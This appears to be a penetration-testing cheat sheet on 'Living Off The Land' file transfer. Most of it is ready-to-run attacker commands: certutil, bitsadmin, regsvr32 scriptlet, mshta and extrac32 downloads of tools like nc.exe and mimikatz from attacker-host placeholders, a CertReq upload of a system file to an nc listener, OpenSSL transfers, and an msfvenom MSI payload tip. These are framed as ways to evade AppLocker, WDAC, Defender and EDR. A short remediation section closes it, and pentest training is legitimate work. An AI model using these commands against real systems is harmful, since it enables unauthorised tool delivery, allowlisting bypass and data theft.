π‘οΈ Methodology Checklist
- certutil download:
certutil -urlcache -split -f http://[LHOST]/[FILE] [FILE] - bitsadmin:
bitsadmin /transfer job /download /priority high http://[LHOST]/[FILE] C:\[FILE] - Regsvr32 scriptlet:
regsvr32 /s /n /u /i:http://[LHOST]/file.sct scrobj.dll - Mshta:
mshta http://[LHOST]/payload.hta - Check if Windows Defender flags LOLBAS usage
- Prefer certutil/BITS for stealthy downloads on older systems
π― Operational Context
Use when: Windows target with AppLocker or WDAC blocking unsigned binaries β use Microsoft-signed LOL binaries for file transfer that bypass application allowlisting.
Think Dumber First: certutil -urlcache -split -f http://[LHOST]/file C:\Temp\file β signed by Microsoft, trusted by default AppLocker policies. bitsadmin as backup. Both are pre-installed on all Windows versions.
Skip when: Target has WDAC rules specifically blocking certutil/bitsadmin network activity β pivot to PowerShell IWR or WebClient.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
certutil.exe -urlcache -split -f http://[TARGET_IP]/nc.exe nc.exe | Download via Certutil (high detection) |
bitsadmin /transfer wcb /priority foreground http://[TARGET_IP]/nc.exe C:\Windows\Temp\nc.exe | Download via BITSAdmin (CMD) |
Import-Module bitstransfer; Start-BitsTransfer -Source "http://[TARGET_IP]/nc.exe" -Destination "C:\Windows\Temp\nc.exe" | Download via BITSAdmin (PowerShell) |
extrac32 /Y /C \\[TARGET_IP]\share\nc.exe C:\Windows\Temp\nc.exe | Download via Extrac32 from SMB (HTTP blocked) |
certreq.exe -Post -config http://[TARGET_IP]:8000/ c:\windows\win.ini | Upload file via CertReq (nc listener on attacker) |
GfxDownloadWrapper.exe "http://[TARGET_IP]/mimikatz.exe" "C:\Temp\mimikatz.exe" | Download via Intel GPU driver binary |
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem | Generate cert for OpenSSL server (Linux) |
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh | Serve file via OpenSSL (encrypted, Linux attacker) |
openssl s_client -connect [TARGET_IP]:80 -quiet > LinEnum.sh | Receive file via OpenSSL client (Linux victim) |
sudo impacket-smbserver share . -smb2support -username [USER] -password [PASS] | Setup SMB server for Extrac32 method |
sudo nc -lvnp 8000 | Listener to catch CertReq POST upload |
π¬ Deep Dive & Workflow
What is LOLBAS / GTFOBins?
Living Off The Land (LOL) uses pre-installed system binaries to perform attacker actions. This:
- Bypasses basic application allowlists (AppLocker, WDAC)
- Avoids dropping suspicious new binaries
- Abuses βimplicit trustβ in signed OS tools
Resources:
- Windows: lolbas-project.github.io β filter by
/downloador/upload - Linux: gtfobins.github.io β filter by
+file downloador+file upload
Windows LOLBAS Comparison
| Binary | Action | Detection | Notes |
|---|---|---|---|
certutil | Download | Very High β Microsoft-CryptoAPI UA, monitored by EDR | Classic; noisy |
BITSAdmin | Download | Medium | Background transfer; mimics Windows Update |
Extrac32 | SMB Download | Low | Useful when HTTP blocked |
CertReq | Upload | Low-Medium | POST request to listener |
GfxDownloadWrapper | Download | Very Low | Intel driver; rarely monitored |
Certutil β Use Only as Last Resort
certutil.exe -urlcache -split -f http://[ATTACKER_IP]/nc.exe nc.exeUser-Agent: Microsoft-CryptoAPI/10.0 β trivially detectable. Switch to BITSAdmin or Extrac32 in monitored environments.
Extrac32 Workflow (HTTP Blocked, SMB Open)
# Attacker: setup authenticated SMB share
sudo impacket-smbserver share . -smb2support -username user -password pass
# Victim: use extrac32 to "extract" from SMB
extrac32 /Y /C \\[ATTACKER_IP]\share\nc.exe C:\Windows\Temp\nc.exeOpenSSL File Transfer (Linux GTFOBins)
Creates an encrypted channel β useful when SSH is unavailable but OpenSSL is present:
# Attacker (serves file)
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < /tmp/LinEnum.sh
# Victim (receives file)
openssl s_client -connect [ATTACKER_IP]:80 -quiet > LinEnum.shExam Mental Model
- HTTP works? β Skip LOLBAS, use standard methods
- HTTP filtered by UA? β Spoof User-Agent (see Evasion)
- AppLocker blocks PS/exe? β Try LOLBAS: BITSAdmin, Extrac32, GfxDownloadWrapper
- SMB blocked too? β CertReq upload / OpenSSL tunnel
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| certutil flagged by Defender | New Defender signatures for certutil download | Use bitsadmin: bitsadmin /transfer job /download /priority high http://[LHOST]/f C:\Temp\f |
| bitsadmin not available | Windows 10 1803+ removed bitsadmin | Use BITS PowerShell: Start-BitsTransfer -Source http://[LHOST]/f -Destination C:\Temp\f |
| msiexec download fails | MSI format required | Package payload as MSI: msfvenom -f msi -p ... > payload.msi |
| wmic /node: download rejected | WMI network query blocked | Try: pcalua.exe -a http://[LHOST]/file or findstr /V doodoo http://[LHOST]/file > C:\Temp\file |
| AppLocker blocks script-based transfer | Publisher rules | Use data URLs or paste content via clipboard through RDP if interactive session available |
π Reporting Trigger
Finding Title: File Transfer via LOLBAS Bypasses Application Allowlisting Impact: Microsoft-signed LOL binaries (certutil, bitsadmin) are permitted by default AppLocker policies and enable file transfer without triggering application allowlisting controls, delivering attacker tools to protected endpoints. Root Cause: Application allowlisting configured to trust all Microsoft-signed binaries without restricting specific binary capabilities (network access for certutil). Recommendation: Implement WDAC rules explicitly restricting certutil and bitsadmin from network access. Monitor LOL binary child processes and network connections. Consider migrating to WDAC publisher rules with specific binary hash allowlisting.